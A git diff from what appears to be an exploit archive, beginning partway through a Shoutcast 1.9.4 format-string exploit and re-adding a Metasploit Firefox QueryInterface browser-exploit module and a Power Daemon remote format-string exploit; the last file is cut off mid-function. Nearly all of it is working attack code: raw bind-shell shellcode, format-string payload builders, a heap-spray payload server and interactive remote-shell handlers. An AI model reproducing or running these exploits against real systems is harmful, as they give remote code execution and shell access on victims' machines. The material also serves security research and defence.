0); + free(ptr); + return bytes; +} + + +int resolv(struct sockaddr_in *addr, char *hostn){ + struct hostent *host; + + if (!inet_aton(hostn, &addr->sin_addr)){ + host = gethostbyname(hostn); + if (host == NULL){ + printf("[-] Wasnt able to resolve %s!\n", hostn); + return -1; + } + addr->sin_addr = *(struct in_addr*)host->h_addr; + } + return 0; +} + + +int conn(struct sockaddr_in addr, int port){ + int sock; + + if((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1){ + return -1; + } + + addr.sin_port = htons(port); + addr.sin_family = AF_INET; + + if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){ + return -1; + } + return sock; +} + + +int get_shell(struct sockaddr_in addr, int port, int sleeps){ + int sock; + char buffer[1024]; + fd_set fds; + + signal(SIGINT, SIG_IGN); + + sleep(sleeps); + + if((sock = conn(addr, port)) == -1) + return (-1); + printf("[+] Wooohooo we got a shell!\n"); + sockprintf(sock, SHELL_COMMAND"\r\n"); + while(1){ + FD_ZERO(&fds); + FD_SET(0, &fds); + FD_SET(sock, &fds); + + if (select(255, &fds, NULL, NULL, NULL) == -1){ + fprintf(stderr,"[-] sending failed\n"); + close(sock); + exit(1); + } + + memset(buffer, 0x0, sizeof(buffer)); + if (FD_ISSET(sock, &fds)){ + if (recv(sock, buffer, sizeof(buffer), 0) == -1){ + fprintf(stderr, "[-] Connection closed by remote host!\n"); + close(sock); + exit(1); + } + fprintf(stderr, "%s", buffer); + } + + if (FD_ISSET(0, &fds)){ + read(0, buffer, sizeof(buffer)); + write(sock, buffer, strlen(buffer)); + } + } + return 0; +} + + +void status(int i, int retloc){ + static int c=1; + + switch(c){ + case 1: + printf("[|] "); + break; + case 2: + printf("[/] "); + break; + case 3: + printf("[-] "); + break; + case 4: + printf("[\\] "); + c = 0; + break; + } + printf("Uploading shellcode[%d] to [%p]\r", i, (void *)retloc); + fflush(stdout); + c++; +} + + +int write_shellcode(struct sockaddr_in addr, int port, int target, int wsleeps){ + char buffer[1024]; + int retloc = ((0xc0000000) - 8 - strlen(shellcode)), i = 0, sock; + + targets[target].retaddr = retloc; + + for(i = 0; i < strlen(shellcode); i++, retloc++){ + if((sock = conn(addr, port)) == -1) + return -1; + + status(i, retloc); + + *((void **)(buffer)) = (void *)((retloc)); + buffer[4] = 0x0; + sockprintf(sock, "GET /content/DD%s.mp3 HTTP/1.1\r\n\r\n", buffer); + + close(sock); + + if(shellcode[i] > 9) + snprintf(buffer, sizeof(buffer), "%%.%du%%%d$hn", shellcode[i], targets[target].dpa_offset); + else { + memset(buffer, 0x41, shellcode[i]); + snprintf(buffer + shellcode[i], sizeof(buffer), "%%%d$hn", targets[target].dpa_offset); + } + + if((sock = conn(addr, port)) == -1) + return -1; + + sockprintf(sock, "GET /content/%s.mp3 HTTP/1.1\r\n\r\n", buffer); + close(sock); +// sleep(1); + usleep(wsleeps * 100000); + } + return 0; + +} + + +int get_target(struct sockaddr_in addr, int port){ + char buffer[1024], *ptr, *ptr2; + int sock, bytes; + + if((sock = conn(addr, port)) == -1){ + printf("failed!\r[-]\n"); + return -2; + } + printf("done!\n"); + + sockprintf(sock, "GET /doesntmatter HTTP/1.1\r\n\r\n"); + + if((bytes = recv(sock, buffer, sizeof(buffer)-1, 0)) == -1){ + printf("[-] Wasnt able to determine version of server, do it yourself!\n"); + return -1; + } + buffer[bytes] = 0x0; + + if(!(ptr = strstr(buffer, "
"))){ + printf("[-] Wasnt able to determine version of server, do it yourself!\n"); + return -1; + } + ptr += 4; + if(!(ptr2 = strstr(ptr, "
"))){ + printf("[-] Wasnt able to determine version of server, do it yourself!\n"); + return -1; + } + *ptr2 = 0x0; + + printf("[!] Version: %s\n", ptr); + + if(strstr(ptr, "Server/Linux v1.9.4")) + return 1; + else if(strstr(ptr, "Server/Linux v1.9.2")) + return 2; + else if(strstr(ptr, "Server/FreeBSD")){ + printf("[-] The server runs on FreeBSD, it could be FBSD 4.x or 5.x choose the target yourself!\n"); + return -1; + } else { + printf("[-] Wasnt able to find target for this server!\n"); + return -1; + } + + return -1; +} + + +int main(int argc, char **argv){ + char *hostn = NULL, buffer[1024]; + int i, sock, opt, target = 0, port = 8000, shell_port = SHELL_PORT, sleeps = 1, wsleeps = 7; + unsigned short ret1, ret2; + struct sockaddr_in addr; + + printf("[!] Shoutcast <= 1.9.4 exploit by crash-x\n"); + + if (argc < 2) + usage(argv[0]); + + while ((opt = getopt (argc, argv, "h:p:t:s:S:")) != -1){ + switch (opt){ + case 'h': + hostn = optarg; + break; + case 'p': + port = atoi(optarg); + if(port > 65535 || port < 1){ + printf("[-] Port %d is invalid\n",port); + return 1; + } + break; + case 't': + target = atoi(optarg); + for(i = 0; targets[i].platform; i++); + if(target >= i){ + printf("[-] Wtf are you trying to target?\n"); + usage(argv[0]); + } + break; + case 's': + sleeps = atoi(optarg); + break; + case 'S': + wsleeps = atoi(optarg); + break; + default: + usage(argv[0]); + } + } + + if(hostn == NULL) + usage(argv[0]); + + resolv(&addr, hostn); + + printf("[!] Connecting to target... "); + fflush(stdout); + if(target == 0){ + if((target = get_target(addr, port)) < 0) + return target; + } else + if(get_target(addr, port) == -2) + exit(-2); + + printf("[!] Targeting: %s\n", targets[target].platform); + + + if(write_shellcode(addr, port, target, wsleeps) != -1) + printf("[+]\n[+] Uploaded shellcode succesful\n"); + else { + printf("[-]\n[-] Wasn't able to upload shellcode, server probably crashed!\n"); + return -1; + } + + printf("[!] Writing retaddr [%p] to retloc [%p]\n", (void *)targets[target].retaddr, (void *)targets[target].retloc); + + + if((sock = conn(addr, port)) == -1){ + printf("[-] Connecting failed!\n"); + return -1; + } + memset(buffer, 0x0, sizeof(buffer)); + *((void **)(buffer)) = (void *)(targets[target].retloc); + *((void **)(buffer + 4)) = (void *)(targets[target].retloc + 2); + sockprintf(sock, "GET /content/DD%s.mp3 HTTP/1.1\r\n\r\n", buffer); + close(sock); + + ret1 = (targets[target].retaddr & 0xffff0000) >> 16; + ret2 = (targets[target].retaddr & 0x0000ffff); + + snprintf(buffer, sizeof(buffer), "%%.%uu%%%d$hn%%.%uu%%%d$hn", + ret1, targets[target].dpa_offset + 1, (ret2 - ret1), targets[target].dpa_offset); + + if((sock = conn(addr, port)) == -1){ + printf("[-] Connecting failed!\n"); + return -1; + } + sockprintf(sock, "GET /content/%s.mp3 HTTP/1.1\r\n\r\n", buffer); + + if(get_shell(addr, shell_port, sleeps) == -1){ + printf("[-] Exploit failed\n"); + return -1; + } + return 1; +} + +// milw0rm.com [2006-01-28] diff --git a/platforms/linux/remote/1474.pm b/platforms/linux/remote/1474.pm index 9c6bdb85c..27b0c944f 100755 --- a/platforms/linux/remote/1474.pm +++ b/platforms/linux/remote/1474.pm @@ -1,273 +1,273 @@ -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -package Msf::Exploit::firefox_queryinterface_linux; - -use strict; -use base "Msf::Exploit"; -use Pex::Text; -use IO::Socket::INET; -use IPC::Open3; - -my $advanced = - { - 'Gzip' => [1, 'Enable gzip content encoding'], - 'Chunked' => [1, 'Enable chunked transfer encoding'], - }; - -my $info = - { - 'Name' => 'Firefox location.QueryInterface() Code Execution (Linux x86)', - 'Version' => '$Revision: 1.1 $', - 'Authors' => - [ - 'H D Moore ', - ], - - 'Description' => - Pex::Text::Freeform(qq{ - This module exploits a code execution vulnerability in the Mozilla - Firefox browser. To reliably exploit this vulnerability, we need to fill - almost a gigabyte of memory with our nop sled and payload. This module has - been tested on Gentoo Linux with the stock Firefox 1.5.0 package. -}), - - 'Arch' => [ 'x86' ], - 'OS' => [ 'linux' ], - 'Priv' => 0, - - 'UserOpts' => - { - 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], - 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], - }, - - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - 'Keys' => ['-bind'], - }, - 'Refs' => - [ - ['CVE', '2006-0295'], - ['BID', '16476'], - ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'], - ], - - 'DefaultTarget' => 0, - 'Targets' => - [ - [ 'Mozilla Firefox 1.5.0.0 on Linux x86' ] - ], - - 'Keys' => [ 'mozilla' ], - - 'DisclosureDate' => 'Feb 02 2006', - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Exploit -{ - my $self = shift; - my $server = IO::Socket::INET->new( - LocalHost => $self->GetVar('HTTPHOST'), - LocalPort => $self->GetVar('HTTPPORT'), - ReuseAddr => 1, - Listen => 1, - Proto => 'tcp' - ); - my $client; - - # Did the listener create fail? - if (not defined($server)) { - $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); - return; - } - - my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ? - Pex::Utils::SourceIP('1.2.3.4') : - $self->GetVar('HTTPHOST'); - - $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/"); - - while (defined($client = $server->accept())) { - $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client)); - } - - return; -} - -sub HandleHttpClient -{ - my $self = shift; - my $fd = shift; - - # Set the remote host information - my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); - - - # Read the HTTP command - my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3); - my $agent; - - # Read in the HTTP headers - while ((my $line = $fd->RecvLine(10))) { - - $line =~ s/^\s+|\s+$//g; - - my ($var, $val) = split(/\:/, $line, 2); - - # Break out if we reach the end of the headers - last if (not defined($var) or not defined($val)); - - $agent = $val if $var =~ /User-Agent/i; - } - - my $os = 'Unknown'; - my $vl = ($agent =~ m/\/1\.5$/) ? 'Vulnerable' : 'Not Vulnerable'; - - $os = 'Linux' if $agent =~ /Linux/i; - $os = 'Mac OS X' if $agent =~ /OS X/i; - $os = 'Windows' if $agent =~ /Windows/i; - - - $self->PrintLine("[*] Client connected from $rhost:$rport ($os/$vl)."); - - if ($os ne 'Linux') { - $self->PrintLine("[*] Invalid target for this exploit, trying anyways..."); - } else { - $self->PrintLine("[*] Sending payload and waiting for execution..."); - } - - my $res = $fd->Send($self->BuildResponse($self->GenerateHTML())); - - $fd->Close(); -} - - -sub JSUnescape { - my $self = shift; - my $data = shift; - my $code = ''; - - # Encode the shellcode via %u sequences for JS's unescape() function - my $idx = 0; - while ($idx < length($data) - 1) { - my $c1 = ord(substr($data, $idx, 1)); - my $c2 = ord(substr($data, $idx+1, 1)); - $code .= sprintf('%%u%.2x%.2x', $c2, $c1); - $idx += 2; - } - - return $code; -} - -sub GenerateHTML { - my $self = shift; - my $target = $self->Targets->[$self->GetVar('TARGET')]; - my $shellcode = $self->JSUnescape($self->GetVar('EncodedPayload')->Payload); - my $data = qq# - - - One second please... - - - - - -#; - return $data; -} - -sub BuildResponse { - my ($self, $content) = @_; - - my $response = - "HTTP/1.1 200 OK\r\n" . - "Content-Type: text/html\r\n"; - - if ($self->GetVar('Gzip')) { - $response .= "Content-Encoding: gzip\r\n"; - $content = $self->Gzip($content); - } - if ($self->GetVar('Chunked')) { - $response .= "Transfer-Encoding: chunked\r\n"; - $content = $self->Chunk($content); - } else { - $response .= 'Content-Length: ' . length($content) . "\r\n" . - "Connection: close\r\n"; - } - - $response .= "\r\n" . $content; - - return $response; -} - -sub Chunk { - my ($self, $content) = @_; - - my $chunked; - while (length($content)) { - my $chunk = substr($content, 0, int(rand(10) + 1), ''); - $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n"; - } - $chunked .= "0\r\n\r\n"; - - return $chunked; -} - -sub Gzip { - my $self = shift; - my $data = shift; - my $comp = int(rand(5))+5; - - my($wtr, $rdr, $err); - - my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force'); - print $wtr $data; - close ($wtr); - local $/; - - return (<$rdr>); -} -1; - -# milw0rm.com [2006-02-07] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. +## + +package Msf::Exploit::firefox_queryinterface_linux; + +use strict; +use base "Msf::Exploit"; +use Pex::Text; +use IO::Socket::INET; +use IPC::Open3; + +my $advanced = + { + 'Gzip' => [1, 'Enable gzip content encoding'], + 'Chunked' => [1, 'Enable chunked transfer encoding'], + }; + +my $info = + { + 'Name' => 'Firefox location.QueryInterface() Code Execution (Linux x86)', + 'Version' => '$Revision: 1.1 $', + 'Authors' => + [ + 'H D Moore ', + ], + + 'Description' => + Pex::Text::Freeform(qq{ + This module exploits a code execution vulnerability in the Mozilla + Firefox browser. To reliably exploit this vulnerability, we need to fill + almost a gigabyte of memory with our nop sled and payload. This module has + been tested on Gentoo Linux with the stock Firefox 1.5.0 package. +}), + + 'Arch' => [ 'x86' ], + 'OS' => [ 'linux' ], + 'Priv' => 0, + + 'UserOpts' => + { + 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], + 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], + }, + + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + 'Keys' => ['-bind'], + }, + 'Refs' => + [ + ['CVE', '2006-0295'], + ['BID', '16476'], + ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'], + ], + + 'DefaultTarget' => 0, + 'Targets' => + [ + [ 'Mozilla Firefox 1.5.0.0 on Linux x86' ] + ], + + 'Keys' => [ 'mozilla' ], + + 'DisclosureDate' => 'Feb 02 2006', + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Exploit +{ + my $self = shift; + my $server = IO::Socket::INET->new( + LocalHost => $self->GetVar('HTTPHOST'), + LocalPort => $self->GetVar('HTTPPORT'), + ReuseAddr => 1, + Listen => 1, + Proto => 'tcp' + ); + my $client; + + # Did the listener create fail? + if (not defined($server)) { + $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); + return; + } + + my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ? + Pex::Utils::SourceIP('1.2.3.4') : + $self->GetVar('HTTPHOST'); + + $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/"); + + while (defined($client = $server->accept())) { + $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client)); + } + + return; +} + +sub HandleHttpClient +{ + my $self = shift; + my $fd = shift; + + # Set the remote host information + my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); + + + # Read the HTTP command + my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3); + my $agent; + + # Read in the HTTP headers + while ((my $line = $fd->RecvLine(10))) { + + $line =~ s/^\s+|\s+$//g; + + my ($var, $val) = split(/\:/, $line, 2); + + # Break out if we reach the end of the headers + last if (not defined($var) or not defined($val)); + + $agent = $val if $var =~ /User-Agent/i; + } + + my $os = 'Unknown'; + my $vl = ($agent =~ m/\/1\.5$/) ? 'Vulnerable' : 'Not Vulnerable'; + + $os = 'Linux' if $agent =~ /Linux/i; + $os = 'Mac OS X' if $agent =~ /OS X/i; + $os = 'Windows' if $agent =~ /Windows/i; + + + $self->PrintLine("[*] Client connected from $rhost:$rport ($os/$vl)."); + + if ($os ne 'Linux') { + $self->PrintLine("[*] Invalid target for this exploit, trying anyways..."); + } else { + $self->PrintLine("[*] Sending payload and waiting for execution..."); + } + + my $res = $fd->Send($self->BuildResponse($self->GenerateHTML())); + + $fd->Close(); +} + + +sub JSUnescape { + my $self = shift; + my $data = shift; + my $code = ''; + + # Encode the shellcode via %u sequences for JS's unescape() function + my $idx = 0; + while ($idx < length($data) - 1) { + my $c1 = ord(substr($data, $idx, 1)); + my $c2 = ord(substr($data, $idx+1, 1)); + $code .= sprintf('%%u%.2x%.2x', $c2, $c1); + $idx += 2; + } + + return $code; +} + +sub GenerateHTML { + my $self = shift; + my $target = $self->Targets->[$self->GetVar('TARGET')]; + my $shellcode = $self->JSUnescape($self->GetVar('EncodedPayload')->Payload); + my $data = qq# + + + One second please... + + + + + +#; + return $data; +} + +sub BuildResponse { + my ($self, $content) = @_; + + my $response = + "HTTP/1.1 200 OK\r\n" . + "Content-Type: text/html\r\n"; + + if ($self->GetVar('Gzip')) { + $response .= "Content-Encoding: gzip\r\n"; + $content = $self->Gzip($content); + } + if ($self->GetVar('Chunked')) { + $response .= "Transfer-Encoding: chunked\r\n"; + $content = $self->Chunk($content); + } else { + $response .= 'Content-Length: ' . length($content) . "\r\n" . + "Connection: close\r\n"; + } + + $response .= "\r\n" . $content; + + return $response; +} + +sub Chunk { + my ($self, $content) = @_; + + my $chunked; + while (length($content)) { + my $chunk = substr($content, 0, int(rand(10) + 1), ''); + $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n"; + } + $chunked .= "0\r\n\r\n"; + + return $chunked; +} + +sub Gzip { + my $self = shift; + my $data = shift; + my $comp = int(rand(5))+5; + + my($wtr, $rdr, $err); + + my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force'); + print $wtr $data; + close ($wtr); + local $/; + + return (<$rdr>); +} +1; + +# milw0rm.com [2006-02-07] diff --git a/platforms/linux/remote/1486.c b/platforms/linux/remote/1486.c index 7ed0d50e0..775380e39 100755 --- a/platforms/linux/remote/1486.c +++ b/platforms/linux/remote/1486.c @@ -1,363 +1,363 @@ -/* - * gexp-powerd.c - * - * Power Daemon v2.0.2 Remote Format String Exploit - * Copyright (C) 2005 Gotfault Security - * - * Bug found and developed by: barros and xgc - * - * Original Reference: - * http://gotfault.net/research/exploit/gexp-powerd.c - * - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -/*==[ Prototypes ]==*/ -void fatal(char *); -void Usage(char *); -void FakeServer(char *,int); -void ExecuteShell(int); -int CreateEvilBuffer(int,int,int,int,char *); -int ConnectToShell(char *,int); - -/*==[ Defines ]==*/ -#define DEFAULT_PORT 532 // Default fake server port -#define BIND_PORT 31337 // Default port to bind -#define NOPSIZE 50 // Number of NOP -#define NOP 0x90 // NOP byte -#define PAD "" // Format string alignment -#define PORT_OFFSET 29 // Offset to fix the shellcode -#define STDIN 0 -#define STDOUT 1 - -/*==[ Targets ]==*/ -struct -{ - char *Name; - int Gotaddr; - int Retaddr; - int Pop; -}Targets[] = - { - "Power Daemon v2.0.2 @ Slackware 10.0", - 0x0804c180, - 0xbffff2d4, - 17, - - "Power Daemon v2.0.2 @ Debian 3.1 Linux", - 0x0804c198, - 0xbffff16c, - 27, - - // Finish - 0, - 0, - 0, - 0 - }; - -/*==[ Shellcode by Marco Ivaldi ]==*/ -char shellcode[] = - "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" - "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80" - "\x89\xc7\x52\x66\x68" - "BP" // Port to bind - "\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80" - "\xb0\x66\xb3\x04\xcd\x80" - "\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80" - "\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80" - "\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"; - -int main(int argc, char **argv) -{ - extern char *optarg; - extern int optind; - char opt; - char *Host = NULL; - int Port = DEFAULT_PORT; - int BindPort = BIND_PORT; - int TargetNumber = -1; - int Sock,i; - char EvilBuffer[1024]; - int BufLen; - - fprintf(stdout,"\n--=[ Power Daemon Remote Format String Exploit ]\n\n"); - - // Process arguments - while ( (opt = getopt(argc,argv,"t:p:r:")) != EOF) - { - switch(opt) - { - case 'r': - BindPort = atoi(optarg); - if(!BindPort) Usage(argv[0]); - break; - case 'p': - Port = atoi(optarg); - if(!Port) Usage(argv[0]); - break; - case 't': - TargetNumber = atoi(optarg); - break; - default: Usage(argv[0]); - break; - } - } - - // Verify target - for(i=0;;i++) - if(Targets[i].Name == 0) break; - if(TargetNumber == -1) Usage(argv[0]); - - fprintf(stdout,"[*] Plataform : %s\n",Targets[TargetNumber].Name); - fprintf(stdout,"[*] Target GOT : %#010x\n",Targets[TargetNumber].Gotaddr); - fprintf(stdout,"[*] Target Retaddr : %#010x\n",Targets[TargetNumber].Retaddr); - fprintf(stdout,"[*] Bind to port : %u\n",BindPort); - fprintf(stdout,"[*] Target POP : %d\n\n",Targets[TargetNumber].Pop); - - CreateEvilBuffer(Targets[TargetNumber].Gotaddr,Targets[TargetNumber].Retaddr,Targets[TargetNumber].Pop,BindPort,EvilBuffer); - FakeServer(EvilBuffer, BindPort); -} - -void FakeServer(char *EvilBuffer, int BindPort) { - - int sock, newsock, i, reuseaddr = 1; - struct sockaddr_in remoteaddr; - struct sockaddr_in localaddr; - int addrlen = sizeof(struct sockaddr_in); - struct hostent *he; - - localaddr.sin_family = AF_INET; - localaddr.sin_port = htons(DEFAULT_PORT); - localaddr.sin_addr.s_addr = INADDR_ANY; - bzero(&(localaddr.sin_zero), 8); - - fprintf(stdout,"[*] Creating Fake Server : "); - - if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { - perror(" socket()"); - printf("\n"); - exit(1); - } - - if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &reuseaddr, - (socklen_t)sizeof(reuseaddr)) < 0) { - perror(" setsockopt()"); - printf("\n"); - exit(1); - } - - if (bind(sock, (struct sockaddr *)&localaddr, sizeof(localaddr)) < 0) { - perror(" bind()"); - printf("\n"); - exit(1); - } - - if (listen(sock, 1) < 0) { - perror(" listen()"); - printf("\n"); - exit(1); - } - - fprintf(stdout, "done\n"); - - printf("[*] Waiting Client : "); - fflush(stdout); - - if ((newsock = accept(sock, (struct sockaddr *)&remoteaddr, &addrlen)) < 0) { - perror(" accept()"); - printf("\n"); - exit(1); - } - - if (getpeername(newsock, (struct sockaddr *)&remoteaddr, &addrlen) < 0) { - perror(" getpeername()"); - printf("\n"); - exit(1); - } - - fprintf(stdout, "done\n"); - - fprintf(stdout, "[*] Host Connected : %s:%u\n", inet_ntoa(remoteaddr.sin_addr), ntohs(remoteaddr.sin_port)); - - fprintf(stdout, "[*] Sending EvilBuffer : "); - if(send(newsock,EvilBuffer,strlen(EvilBuffer)+1,0) == -1) { - fatal("send()"); - } - - fprintf(stdout, "done\n\n"); - - memset(EvilBuffer, 0x00, sizeof(EvilBuffer)); - strcpy(EvilBuffer, (char *)inet_ntoa(remoteaddr.sin_addr)); - - close(newsock); - - sleep(1); - - newsock = ConectToShell(EvilBuffer,BindPort); - - if(newsock == -1) { - fprintf(stdout,"[*] Exploit Failed.\n\n"); - exit(0); - } - else { - fprintf(stdout,"[*] Spawning Shell...\n\n"); - ExecuteShell(newsock); - close(newsock); - } - - fflush(stdout); -} - -int CreateEvilBuffer(int GOT, int RETADDR, int POP, int BINDTOPORT, char *buffer) -{ - char *nops = malloc(NOPSIZE+1); - char *ptr; - unsigned short *len; - unsigned short *portPtr = (unsigned short *)(shellcode+PORT_OFFSET); - - // Fix shellcode - *portPtr = htons(BINDTOPORT); - - ptr = buffer; - - // Create Nops - bzero(nops,NOPSIZE+1); - memset(nops,NOP,NOPSIZE); - - fprintf(stdout, "[*] Creating EvilBuffer : "); - - // Create format string attack - sprintf(ptr,"WHATIDO " - PAD - "%c%c%c%c" - "%c%c%c%c" - "%%.%dd" - "%%%d$hn" - "%%.%dd" - "%%%d$hn" - "%s%s", - ((u_long)GOT), - ((u_long)GOT >> 8), - ((u_long)GOT >> 16), - ((u_long)GOT >> 24), - ((u_long)GOT+2), - (((u_long)GOT+2) >> 8), - (((u_long)GOT+2) >> 16), - (((u_long)GOT+2) >> 24), - ((RETADDR & 0x0000FFFF) - 26), - POP, - (((RETADDR & 0xFFFF0000)>>16) + 0x10000 - (RETADDR & 0x0000FFFF)), - POP+1,nops,shellcode); - fprintf(stdout, "done\n"); - fflush(stdout); - - return (strlen(ptr)); -} - -int ConectToShell(char *Host,int Port) -{ - struct sockaddr_in server; - struct hostent *hp; - int s; - - server.sin_family = AF_INET; - hp = gethostbyname(Host); - if(!hp) return(-1); - - memcpy(&server.sin_addr,hp->h_addr,hp->h_length); - server.sin_port = htons(Port); - - s = socket(PF_INET,SOCK_STREAM,0); - if(connect(s,(struct sockaddr *)&server, sizeof(server)) < 0) - return(-1); - - return(s); -} - -void ExecuteShell(int Sock) -{ - char buffer[1024 * 10]; - int count; - fd_set readfs; - - write(Sock,"uname -a;id\n",12); - while(1) - { - FD_ZERO(&readfs); - FD_SET(STDIN, &readfs); - FD_SET(Sock, &readfs); - if(select(Sock + 1, &readfs, NULL, NULL, NULL) > 0) - { - if(FD_ISSET(STDIN, &readfs)) - { - if((count = read(STDIN, buffer, 1024)) <= 0) - { - if(errno == EWOULDBLOCK || errno == EAGAIN) - continue; - else - { - close(Sock); - exit(-1); - } - } - write(Sock, buffer, count); - } - if(FD_ISSET(Sock, &readfs)) - { - if((count = read(Sock, buffer, 1024)) <= 0) - { - if(errno == EWOULDBLOCK || errno == EAGAIN) - continue; - else - { - close(Sock); - exit(-1); - } - } - write(STDOUT, buffer, count); - } - } - } -} - -void fatal(char *ErrorMsg) -{ - fprintf(stderr,"ERROR - %s\n\n",ErrorMsg); - exit(1); -} - - -void Usage(char *Prog) -{ - int i; - fprintf(stderr, "Usage: %s \n\n" - "Options:\n\n" - " -t target : Select the target\n" - " -p portnumber : Sets a new port number \n" - " -r bindport : Sets the port to bind a shell \n\n" - "Targets:\n\n",Prog,DEFAULT_PORT,BIND_PORT); - - for(i=0;;i++) - { - if(Targets[i].Name != 0) - fprintf(stderr," [%u] %s\n",i,Targets[i].Name); - else - break; - } - fprintf(stderr,"\n"); - exit(1); -} - -// milw0rm.com [2006-02-10] +/* + * gexp-powerd.c + * + * Power Daemon v2.0.2 Remote Format String Exploit + * Copyright (C) 2005 Gotfault Security + * + * Bug found and developed by: barros and xgc + * + * Original Reference: + * http://gotfault.net/research/exploit/gexp-powerd.c + * + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/*==[ Prototypes ]==*/ +void fatal(char *); +void Usage(char *); +void FakeServer(char *,int); +void ExecuteShell(int); +int CreateEvilBuffer(int,int,int,int,char *); +int ConnectToShell(char *,int); + +/*==[ Defines ]==*/ +#define DEFAULT_PORT 532 // Default fake server port +#define BIND_PORT 31337 // Default port to bind +#define NOPSIZE 50 // Number of NOP +#define NOP 0x90 // NOP byte +#define PAD "" // Format string alignment +#define PORT_OFFSET 29 // Offset to fix the shellcode +#define STDIN 0 +#define STDOUT 1 + +/*==[ Targets ]==*/ +struct +{ + char *Name; + int Gotaddr; + int Retaddr; + int Pop; +}Targets[] = + { + "Power Daemon v2.0.2 @ Slackware 10.0", + 0x0804c180, + 0xbffff2d4, + 17, + + "Power Daemon v2.0.2 @ Debian 3.1 Linux", + 0x0804c198, + 0xbffff16c, + 27, + + // Finish + 0, + 0, + 0, + 0 + }; + +/*==[ Shellcode by Marco Ivaldi ]==*/ +char shellcode[] = + "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" + "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80" + "\x89\xc7\x52\x66\x68" + "BP" // Port to bind + "\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80" + "\xb0\x66\xb3\x04\xcd\x80" + "\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80" + "\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80" + "\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"; + +int main(int argc, char **argv) +{ + extern char *optarg; + extern int optind; + char opt; + char *Host = NULL; + int Port = DEFAULT_PORT; + int BindPort = BIND_PORT; + int TargetNumber = -1; + int Sock,i; + char EvilBuffer[1024]; + int BufLen; + + fprintf(stdout,"\n--=[ Power Daemon Remote Format String Exploit ]\n\n"); + + // Process arguments + while ( (opt = getopt(argc,argv,"t:p:r:")) != EOF) + { + switch(opt) + { + case 'r': + BindPort = atoi(optarg); + if(!BindPort) Usage(argv[0]); + break; + case 'p': + Port = atoi(optarg); + if(!Port) Usage(argv[0]); + break; + case 't': + TargetNumber = atoi(optarg); + break; + default: Usage(argv[0]); + break; + } + } + + // Verify target + for(i=0;;i++) + if(Targets[i].Name == 0) break; + if(TargetNumber == -1) Usage(argv[0]); + + fprintf(stdout,"[*] Plataform : %s\n",Targets[TargetNumber].Name); + fprintf(stdout,"[*] Target GOT : %#010x\n",Targets[TargetNumber].Gotaddr); + fprintf(stdout,"[*] Target Retaddr : %#010x\n",Targets[TargetNumber].Retaddr); + fprintf(stdout,"[*] Bind to port : %u\n",BindPort); + fprintf(stdout,"[*] Target POP : %d\n\n",Targets[TargetNumber].Pop); + + CreateEvilBuffer(Targets[TargetNumber].Gotaddr,Targets[TargetNumber].Retaddr,Targets[TargetNumber].Pop,BindPort,EvilBuffer); + FakeServer(EvilBuffer, BindPort); +} + +void FakeServer(char *EvilBuffer, int BindPort) { + + int sock, newsock, i, reuseaddr = 1; + struct sockaddr_in remoteaddr; + struct sockaddr_in localaddr; + 